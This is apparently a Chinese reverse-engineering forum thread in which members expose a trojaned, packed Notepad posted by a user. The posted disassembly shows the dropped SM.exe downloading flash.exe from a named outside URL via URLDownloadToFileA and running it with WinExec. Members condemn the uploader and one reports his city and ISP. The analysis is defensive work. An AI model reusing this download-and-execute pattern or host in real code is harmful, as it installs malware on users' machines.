这是什么意思？木马？

:(

贴错地方了:D

没错！是楼主发的那个加壳记事本里的！

0007FF84    0100DA89  /CALL 到 CreateFileA 来自 NOTEPAD.0100DA87
0007FF88    0100DAD5  |FileName = "E:\安全工具\幕后黑手\SM.exe"
0007FF8C    C0000000  |Access = GENERIC_READ|GENERIC_WRITE
0007FF90    00000003  |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0007FF94    00000000  |pSecurity = NULL
0007FF98    00000002  |Mode = CREATE_ALWAYS
0007FF9C    00000020  |Attributes = ARCHIVE
0007FFA0    00000000  \hTemplateFile = NULL

00401158     57                push edi            ; SM.00404070
00401159     00EC              add ah,ch
0040115B     83C4 F0           add esp,-10
0040115E     B8 38114000       mov eax,SM.00401138
00401163     E8 D0FEFFFF       call SM.00401038
00401168     68 A0114000       push SM.004011A0
0040116D     E8 96FFFFFF       call SM.00401108    ; jmp to kernel32.OutputDebugStringA
00401172     6A 00             push 0
00401174     6A 00             push 0
00401176     68 C4114000       push SM.004011C4    ; ASCII "C:\EaddySM.exe"
0040117B     68 D4114000       push SM.004011D4    ; ASCII "http://www.hoomoo.com/tt/flash.exe        "
00401180     6A 00             push 0
00401182     E8 79FFFFFF       call SM.00401100    ; jmp to URLMON.URLDownloadToFileA
00401187     6A 00             push 0
00401189     68 C4114000       push SM.004011C4    ; ASCII "C:\EaddySM.exe"
0040118E     E8 5DFFFFFF       call SM.004010F0    ; jmp to kernel32.WinExec
00401193     6A 00             push 0
00401195     E8 5EFFFFFF       call SM.004010F8    ; jmp to kernel32.ExitProcess

http://www.hoomoo.com/:D
是个卖成人用品的
很怕人的:D [18禁]

程序运行后如果有 E:\安全工具\幕后黑手 目录
则生成SM.exe
SM.exe运行后从http://www.hoomoo.com/tt/flash.exe下载这个程序

flash.exe的OEP
1314C2EC     55                push ebp
1314C2ED     8BEC              mov ebp,esp
1314C2EF     B9 0A000000       mov ecx,0A
1314C2F4     6A 00             push 0
1314C2F6     6A 00             push 0
1314C2F8     49                dec ecx
1314C2F9     75 F9             jnz short flash.1314C2F4
1314C2FB     51                push ecx
1314C2FC     53                push ebx
1314C2FD     56                push esi
1314C2FE     57                push edi
1314C2FF     B8 64C21413       mov eax,flash.1314C264
1314C304     E8 0390FFFF       call flash.1314530C

Delphi 程序

请楼主出来解释一下为何放这个东西？
否则封其IP

fly不得了！

:D

应该鞭史叁日

HEHE，和上次有异曲同工之妙啊。吉林省长春市网通ADSL，2000，IE6。0，不过封IP可能没什么用，因为可能是走肉鸡代理的。还是挂起来来晾一晾吧，让大家看看她的小秘密，然后暴尸街头，造众人唾骂。:D :D :D

鄙视放木马的

以后这些注册时间不长，发贴数量很少的id都要警惕
要么是请求破解的要么是别有用心的

我有定力，我好奇心不强，我不受标题诱惑

下次换论坛抢注heXer

最初由 heXer 发布
以后这些注册时间不长，发贴数量很少的id都要警惕
要么是请求破解的要么是别有用心的

我有定力，我好奇心不强，我不受标题诱惑

赞:D

鄙视，呵呵。:D

我闪！！！！

最初由 heXer 发布
以后这些注册时间不长，发贴数量很少的id都要警惕
要么是请求破解的要么是别有用心的

我有定力，我好奇心不强，我不受标题诱惑

看看你对VCASM壳定力有多少
哈哈

最初由 forgot 发布
下次换论坛抢注heXer

那我就抢注forgot了，呵呵~:D :D :D

真他妈的可恶！！！

最初由 fly 发布
程序运行后如果有 E:\安全工具\幕后黑手 目录
则生成SM.exe

如果没有呢？是不是会自动创建目录？不然机会不大的说，有“E:\安全工具\幕后黑手”这个目录的概率很小啊

真是个好东东！！！

好用！！！

最初由 forgot 发布
下次换论坛抢注heXer

那我就抢注forgot吧;) :D

最初由 rain 发布
真是个好东东！！！

好用！！！

看你真是惟恐天下不乱。鉴于你的一惯表现，取消你的发言资格！
上次的警告：
http://bbs.pediy.com/showthread.php?s=&threadid=6660&perpage=15&pagenumber=2

当剑。

马夫 哎 .老大 这种 垃圾 要清理